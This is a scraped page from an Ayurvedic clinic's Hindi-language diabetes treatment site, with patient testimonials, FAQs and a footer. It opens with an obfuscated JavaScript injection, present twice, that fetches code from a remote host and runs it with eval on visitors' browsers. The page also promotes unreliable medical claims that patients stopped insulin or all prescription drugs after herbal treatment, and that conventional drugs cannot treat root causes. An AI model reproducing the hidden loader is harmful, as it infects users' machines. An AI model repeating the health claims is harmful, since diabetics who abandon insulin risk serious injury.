;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());}; ;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());};

अब मुझे नुस्खे में लिखी गई दवाओं की ज़रूरत नहीं पड़ती

https://youtu.be/fpsT_LIvWBo
”आयुशक्ति के छह महीने के उपचार के भीतर, मेरी रक्त शर्करा और एचबीए1सी 9.0 से 6.0 तक कम हो गया तथा मेरा रक्तदाब कम होकर 110/74 हो गया। आयुशक्ति आहार दिशानिर्देशों और जड़ीबूटियों को फॉलो करके, अब मेरे जीपी ने सभी नुस्खा दवाओं को बंद कर दिया है”।

~ रघु, यूएसए

मुझे ताज़गी और ऊर्जावान महसूस होता है, और नियंत्रित मधुमेह से मैंने अपना वज़न 10 किलो कम कर लिया है।

https://youtu.be/zl-nnABpJoQ
आयुशक्ति के पांच सप्ताहों के डायबेटॉक्स उपचार से मुझे अपनी मधुमेह को नियंत्रित करने में मदद मिली जिससे मैं पिछले कुछ वर्षों से पीड़ित था। मुझे ताज़गी, ऊर्जा महसूस होती है, और मैंने अपना वज़न 10 किलो कम कर लिया है”।

~ बज्जी गोर्डन, यूएसए

मधुमेह से पीड़ित पुरूषों में 27 से 75% पुरूष स्तंभन दोष (इरेक्टाइल दुष्क्रिया या विकार) से पीड़ित होते हैं। (9-29)।

मधुमेह से पीड़ित पुरूषों में गैर-मधुमेह वाले पुरूषों की तुलना में स्तंभन दोष (इरेक्टाइल दुष्क्रिया या विकार) से पीड़ित होने का जोखिम काफी अधिक होता है। ऐसा मधुमेह की दशाओं के दौरान तंत्रिकाओं और रक्तवाहिकाओं को होने वाली क्षति के कारण होता है।

https://care.diabetesjournals.org/content/25/8/1458

https://www.mayoclinic.org/diseases-conditions/erectile-dysfunction/in-depth/erectile-dysfunction/art-20043927

कभी-कभी मधुमेह की दवाओं से दुष्प्रभाव हो सकते हैं या आपके द्वारा ली जाने वाली अन्य दवाओं के साथ ये मिक्स नहीं होती हैं और आप पेट में गड़बड़, बी 12 की कमी, असामान्य कमज़ोरी, थकान, निद्रालुता, सांस लेने में कठिनाई, मांसपेशी में पीड़ा, मूत्र पथ संक्रमणों, फंगस संक्रमणों या लेक्टिक एसिडोसिस जैसी गंभीर दशा जैसे लक्षणों का अनुभव करते हैं।

कुछ दवाओं से हृदय की समस्याएं होने की संभावना बढ़ जाती है और तथा स्ट्रेस्ड लीवर के ब्लड मार्कर्स में बढ़ोतरी हो जाती है। इंसुलिन थेरेपी का सर्वाधित आम दुष्प्रभाव निम्न रक्तशर्करा होता है। आपको सिरदर्द, चकत्ते, चक्कर आना, चिंता, खांसी तथा शुष्क मुंह भी हो सकता है।

https://www.webmd.com/diabetes/diabetes-drugs-side-effects-interactions

मधुमेह की दीर्घकालिक जटिलताएं धीरे-धीरे बढ़ती हैं। जितने लंबे समय तक आपको अनियंत्रित मधुमेह होगी- उतना ही अधिक जटिलताओं का जोखिम होता है।

दीर्घकालिक मधुमेह की गंभीर जटिलताओं में हृदय वाहिकाओं में अवरोध, दिल का दौरा, तंत्रिका को क्षति (न्यूरोपैथी), गुर्दे को क्षति, रेटिनोपैथी, पैर में क्षति, त्वचा संक्रमण, श्रवण विकार, अल्जाइमर रोग तथा अवसाद शामिल हैं।

https://www.mayoclinic.org/diseases-conditions/diabetes/symptoms-causes/syc-20371444

मैं 2 महीने के आयुशक्ति उपचार से नियंत्रित मधुमेह के साथ ताज़गी और ऊर्जा महसूस करता हूं।

https://youtu.be/UrPfY6Ah0-4
” उच्च मधुमेह, उच्च रक्तदाब, और उच्च कोलेस्ट्रॉल से मेरा जीवन नरक बन गया था और मुझे बहुत सी दवाएं लेनी पड़ती थीं, फिर भी इन समस्याओं से मुझे कोई राहत नहीं मिल रही थी। फिर मेरी पत्नी मुझे आयुशक्ति केन्द्र में लेकर आई और मैंने उपचार शुरू किया। मेरी मधुमेह को नियंत्रित करने में आयुशक्ति के प्रभावशाली परिणामों से मैं आश्चर्यचकित हूं। उच्च रक्तदाब और कोलेस्ट्रॉल भी नियंत्रण में हैं। मैं उपचार से बहुत ताज़गी और हल्का महसूस करता हूं”।

~ कुमार राठी, मुंबई

अब आप समझ गए होंगे कि क्यों आपको अपनी रक्त शर्करा स्तरों नियंत्रित करने और मुख्य कारण को दूर करके इंसुलिन पर निर्भरता को रोकने की ज़रूरत है।

नुस्खे पर लिखी गई दवाओं की उच्च खुराकों तथा इंसुलिन थेरेपी से मधुमेह के मुख्य कारणों को दूर नहीं किया जा सकता है। केवल सशक्त चयापचय प्रणाली और अग्नाशय कार्यों की स्थापना करके ही दीर्घकाल में रक्त शर्करा स्तरों में संतुलन बनाने में सहायता मिल सकती है। इस प्रकार, आप अपने रक्त शर्करा स्तरों में बढ़ोतरी किए बिना अपने पसंदीदा खान-पान का आनंद ले पाएंगे।

लेकिन चिंता न करें। सशक्त चयापचय प्रणाली तैयार करना कठिन नहीं है, और जीवन भर आपको इसके लिए कोई पैसा भी खर्च नहीं करना पड़ता है। यदि आप सही प्राकृतिक प्लान को फॉलो करते हैं, तो आप अपने इंसुलिन सेवन के साथ स्वस्थ और संतुलित शर्करा स्तरों को बनाए रखने में समर्थ हो सकते हैं और बिना किसी जटिलता के ऐसा जीवनभर बनाए रख सकते हैं।

तुमच्या आरोग्यात परिवर्तन करण्यासाठी ३ कृतींच्या पायऱ्या

आमच्या आयुर्वेद तज्ज्ञाशी व्हिडीओ/समोरासमोर सल्लामसलत

तुमची सुटसुटीत आहार योजना तुमचे आरोग्य सुधारण्यात ५०% भूमिका बजावते.

तुमचे सुटसुटीत वनौषधी फॉर्म्युले आणि विषहरण योजना दीर्घकाल टिकणाऱ्या आरोग्यासाठी उल्लेखनीय परिवर्तन निर्माण करते

अंत में आप निम्नलिखित के संबंध में संतुष्टि महसूस कर पाएंगे:


1• स्वस्थ और नियंत्रित रक्त शर्करा स्तर

2• दीर्घकाल के लिए सशक्त पाचन कार्य

3• तेज दवाओं और इंसुलिन पर निर्भरता और उनके गंभीर दुष्प्रभावों में कमी

4• स्वस्थ हृदय, गुर्दे, यकृत और तंत्रिका कार्यों के साथ जीवन की उन्नत गुणवत्ता

निर्णय आपको करना है…

वारंवार विचारले जाणारे प्रश्न

क्या मैं अपनी अन्य दवाएं और आयुशक्ति जड़ी-बूटी दवाएं और उपचार साथ-साथ ले सकता/ती हूं?

हां, आप ऐसा कर सकते हैं। उनके बीच में 30-मिनट का अंतर रखें।

क्या मेरे स्वास्थ्य में सुधार की गारंटी है?

हम पिछले 34 वर्षों से 108 देशों के लोगों की सहायता करते चले आ रहे हैं, और हमारे डॉक्टर्स अब तक 4.5 मिलियन से अधिक परामर्शी सेवाएं प्रदान कर चुके हैं, जिनमें लोगों के 300 से अधिक लक्षणों में राहत प्रदान की गई है। हम समस्या के मूल कारण पर काम करते हैं, और 90% लोग अपनी स्वास्थ्य दशाओं के संबंध में प्रभावी परिणाम प्राप्त करते हैं।

अपने लक्षणों में राहत पाने में मुझे कितना समय लगेगा?

पूरी दुनिया में प्रकाशित दर्जनों शोध अध्ययनों के हमारे रिकार्ड के अनुसार, अधिकांश लोग हमारे प्रोग्राम को फॉलो करते हुए 15 दिनों से 2 महीनों के अंदर अपने लक्षणों में राहत महसूस करने लगते हैं।

क्या यह उपचार प्लान सुरक्षित है?

हमारे उपचार प्लान में 6 मालिकाना 100% प्राकृतिक साधन शामिल हैं जो कि शोध के आधार पर साबित किए गए हैं, सुरक्षित और प्रभावी हैं।

क्या आपके पास उन लोगों के मामलों से संबंधित अध्ययन हैं जिनको लंबे समय से चले आ रहे लक्षणों से राहत मिली है?

हां, हमारे पास हजारों प्रसन्न क्लाइंट का रिकार्ड है जिनके लंबे समय से चले आ रहे लक्षणों में उल्लेखनीय राहत मिली है। ऐसे अनेक मामले-अध्ययन (केस स्टडी) हैं जिनका प्रकाशन यूके और यूएस-आधारित अंतर्राष्ट्रीय पत्रिकाओं में हुआ है।

बिना व्यक्तिगत मुलाकातों के डॉक्टर्स क्लाइन्ट्स के साथ कैसे परामर्श करते हैं और उनकी समस्या को समझ पाते हैं?

हमारे डॉक्टर्स ने 100,000 फ़ोन और वीडियो कंसल्टेशन दिए हैं। वे फेस-टू-फेस या वीडियो कंसल्टेशन के ज़रिए स्वास्थ्य दशाओं के मूल कारणों का विश्लेषण करने में विशेषज्ञ हैं। वे रिपोर्टों की भी जांच करते हैं और लक्षणों का विस्तृत मूल्यांकन करते हैं। जब वे प्राचीन दृष्टिकोण से मूल कारण का विश्लेषण कर लेते हैं, तो वे 6 मालिकाना साधनों का प्रयोग करते हुए आपके पूर्ण स्वास्थ्य लाभ के लिए 3 आर चरणों का प्लान तैयार करते हैं।

क्या आयुशक्ति डॉक्टर एक से अधिक स्वास्थ्य समस्याओं के लिए परामर्श प्रदान करते हैं?

लोग प्राकृतिक उपचार को अंतिम उपाय के रूप में सुनते हैं। इसी वजह से हमने मूल कारण पर ध्यान केन्द्रित करते हुए एक से अधिक समस्याओं के उपचार में विशेषज्ञता हासिल की है। परिणाम के तौर पर, एक से अधिक समस्याओं में प्राकृतिक रूप से राहत मिल जाती है।

क्या जड़ी-बूटी दवाएं मंहगी होती हैं?

आयुशक्ति के जड़ी-बूटी सूत्रों को 10 गुणा संकेन्द्रित शक्तिशाली सत्वों से तैयार किया जाता है। इसलिए ये प्रभावी साबित होती हैं और उनके परिणाम मिलते हैं। हम यह सुनिश्चित करने के लिए कि प्रत्येक बैच द्वारा समान प्रभाविकता प्रदान की जाती है, उनकी बहुत ही उन्नत मशीनों पर जांच भी करते हैं। इसके अलावा, हम भारी धातुओं, कीटनाशकों, तथा माइक्रोबियल गणना के लिए हर बैच की जांच करते हैं, ताकि आपकी सुरक्षा को तय किया जा सके। हमारे बैचों को यूरोपीय प्रयोगशाला की गुणवत्ता से नियंत्रित किया जाता है जिनकी वजह से यह मंहगे परन्तु प्रभावी और सुरक्षित हो जाते हैं। इसके अलावा, हमारे प्राचीन प्रमाणित उपचार प्रोग्रामों से लोगों को जीवन भर के लिए एलोपैथिक दवाओं का सेवन रोकने और सर्जरी आदि से बचने में मदद मिली है। यदि आप तुलना करते हैं, उन खर्चों के बदले में, लाभ बहुत अधिक होते हैं।

डॉक्टरों द्वारा दिए गए उपचारों के अलावा हमें दवाएं क्यों खरीदनी चाहिए?

आयुशक्ति के प्राकृतिक उपचार प्रोग्राम में 6 मालिकाना टूल्स शामिल हैं जिनका प्रयोग आपकी बीमारी के मूल कारण में बदलाव करना है। 1.5 मिलियन क्लाइंट्स पर की गए हमारे शोध के आधार पर, ये 6 टूल्स मिलकर काम करते हैं ताकि आपके पुराने लक्षणों से आपको दीर्घकालिक राहत प्रदान की जा सके। निर्णय आपको करना है। हम किसी भी चीज के लिए जबरदस्ती नहीं करते हैं।

आयुशक्ति द्वारा फोन/वीडियो कंसल्टेशन के लिए कम चार्ज क्यों लिया जाता है?

इस महामारी में लोग क्लिनिक नहीं आ सकते हैं। आपके जीवन में वास्तविक जीवंत स्वास्थ्य का सृजन करने के प्रति हमारी वचनबद्धता के तौर पर हम उनकी सहायता करना चाहते हैं।

हम पेमेंट लिंक पर कैसे भरोसा कर सकते हैं? यह नकली क्यों नहीं हो सकता है?

हम जिन पेमेंट गेटवे का प्रयोग करते हैं, उनके साथ हमें उच्चतम आश्वासन एसएसएल /टीएलएस प्रमाणपत्र मिलता है, जिससे यह तय किया जाता है कि किसी भी अप्राधिकृत व्यक्ति द्वारा इंटरनेट पर संवेदनशील डेटा को नहीं देखा जा सकता है।

मैं बहुत बूढ़ा हूं और मेरे पास तकनीक संबंधी सहायता उपलब्ध नहीं है। मैं भुगतान नहीं कर सकता। मैं फ़ोन /वीडियो कंसल्टेशन कैसे प्राप्त कर सकता /ती हूं?

चिंता की कोई बात नहीं है। हमारे ग्राहक देखभाल सहायक द्वारा फोन पर तकनीक का इस्तेमाल करने में सहायता की जाएगी और आपके बैंक खाते के ब्यौरे या कोई अन्य टूल, जो आपके लिए सुगम हो, का प्रयोग करके आसानी से भुगतान प्राप्त कर लिया जाएगा। व्यक्तिगत सहायता के लिए टोल –फ्री नम्बर पर कॉल करें या चैट करें।

क्या व्यक्तिगत कंसल्टेशन के लिए मुझे अपने साथ कोई पिछली चिकित्सा रिपोर्ट आदि को साथ लाना होगा?

साथ लाएं या पिछली चिकित्सा रिपोर्ट/एक्स-रे, यदि कोई हैं, को हमें भेज दें। इससे आयुशक्ति डॉक्टरों को निदान का विश्लेषण करने में मदद मिलेगी तथा आपके लाभ के लिए, आपकी ज़रूरतों के मुताबिक 3 आर उपचार प्लान तैयार करने में सहायता मिलेगी।

क्या मेरी उच्च रक्त शर्करा दशा हमेशा के लिए ठीक हो जाएगी?

टाइप 2 मधुमेह, जीवन शैली से संबंधित समस्या है। इसको जीवनभर मैनेज करना पड़ता है। आयुशक्ति के प्राकृतिक जड़ी-बूटी सूत्रों के साथ, आप न केवल रक्त शर्करा को नियंत्रित कर सकते हैं बल्कि अंगों को होने वाली क्षति की भी रोकथाम कर सकते हैं क्योंकि जड़ी-बूटियां डिटॉक्सीफाई करती हैं और सभी अंगों के कार्यों को फिर से स्थापित करती हैं।

आयुशक्ति की वे कौन सी जड़ी बूटियां हैं जिनका डाइट प्लान (आहार योजना) के साथ मैं नियमित सेवन कर सकता हूं?

आयुशक्ति के विशेषज्ञों द्वारा आपकी जीवनशैली और आहार आवश्यकताओं के अनुसार दवाओं और जड़ी-बूटियों का नुस्खा लिख कर दिया जाएगा।

मैं मधुमेह कारण स्तंभन विकार से पीड़ित हूं। क्या आयुशक्ति डायबेटॉक्स उपचार मेरी मदद कर सकता है?

डायबेटॉक्स थेरेपीज़ से सभी कार्यों की पुन: स्थापना में मदद मिलती है जिसमें प्राकृतिक रूप से उन्नत सहनशक्ति और जीवन –शक्ति शामिल है। आप अपनी यौन क्षमता में धीरे-धीरे सुधार देख सकते हैं।

वास्तव लोक. वास्तव सुधारणा

मैं अनियंत्रित मधुमेह और फ्रोज़न शोल्डर से पीड़ित था। दवा लेने और पंचकर्म करवाने का बाद, मेरी मधुमेह अब नियंत्रित है और मेरा फ्रोज़न शोल्डर 60% तक ठीक हो गया है। डॉक्टर और सभी सम्बद्ध कर्मचारी बहुत ही सहयोग करते हैं। उपचार बहुत प्रभावी है और मैं बहुत बेहतर महसूस कर रहा हूं। आयुशक्ति तथा टीम को धन्यवाद
–देविन्दर सिंह

 मुझे 13 वर्षों से मधुमेह थी। मैं दवा लेती थी और उसके साथ मुझे हर रोज़ 62 यूनिट इंसुलिन लेनी पड़ती थी। मुझे न्यूरोपैथी और रेटिनोपैथी भी थी। मैं आयुशक्ति के अंधेरी क्लीनिक में आई, आयुशक्ति के डॉक्टर से मुलाकात की और डिटॉक्स किया। 1 महीने में, मैंने इंसुलिन लेनी बंद कर दी और अब मेरे रक्त शर्करा स्तर कम हैं। न्यूरोपैथी पूरी तरह से ठीक हो गई है। क्लिनिक कर्मचारियों से मैं बहुत प्रसन्न हूं। बहुत ही दयालु और सहयोग करने वाले हैं। क्लिनिक बहुत अच्छा है।
–सुषमा जेम्स

 मेरी माता को मधुमेह थी, वह आयुशक्ति दवाएं ले रही हैं और डिटॉक्स करवाती हैं, अब एलोपैथी दवाएं आधी रह गई हैं… और मधुमेह की जांच सामान्य है । उन्होंने आयुशक्ति डॉक्टर से मुलाकात की थी। वे बहुत ही अच्छे और ज्ञानवान हैं।
–अपूर्व डेढिया

Close
Close
Close

My Cart

Shopping cart is empty!

Continue Shopping

Treatments: Arthritis | Asthma | Weight Loss | Skin | Infertility | Acidity | Diabetes | Stress | PCOS - PCOD | Hairfall | Knee Pain | Blood pressure | Thyroid | Headache | Cold Cough | Child problems

 

E-books: Arthritis | PCOD | Immunity | Psoriasis | Asthma | Stress | Acidity | Thyroid | Charaka Samhita | Ashtanga HridayaFrozen ShoulderObesity

 

Research Papers: Immunity | Asthma | Diabetes | Arthritis | Infertility | Diffuse Axonal Injury | Hypertension

 

Newsletter: Newsletter 2023

 

blog: A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z

 

Ayushakti.com © 2023. All Rights Reserved.